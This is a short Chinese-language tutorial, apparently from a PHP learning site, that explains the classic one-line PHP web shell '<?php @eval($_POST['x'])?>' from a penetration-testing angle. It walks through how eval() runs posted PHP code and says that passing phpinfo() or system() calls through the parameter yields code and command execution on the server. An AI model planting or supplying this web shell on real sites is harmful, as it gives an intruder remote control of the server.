一句話木馬解析
首先,學習滲透時,木馬大概也就三種:大馬、小馬、一句話。
常見的一句話:
<?php @eval($_POST['x'])?>
這個應該是最常見的了...看一下他的組成.
首先是一個eval函數,其次是post提交一個參數為x的值.首先我們看看eval函數是做什麼的。
官方說明:
eval() 函數把字串依照 PHP 程式碼來計算。
該字串必須是合法的 PHP 程式碼,且必須以分號結尾。
如果沒有在程式碼字串中呼叫 return 語句,則傳回 NULL。如果程式碼中存在解析錯誤,則 eval() 函數傳回 false。
語法:
eval(phpcode)
簡單來說就是他可以執行一些php的函數和php程式碼.有這個就夠了.
這樣我們了解就簡單多了,我們直接給他post傳一些PHP程式碼不就好了?
比如:phpinfo()函式,system函數等。
可以看到我這裡的phpinfo函數已經被執行了。
命令執行也是可以的
PHP程式碼也是可以順利執行:
#推薦視頻教學:PHP影片教學
#以上是php一句話圖片木馬怎麼解析的詳細內容。更多資訊請關注PHP中文網其他相關文章!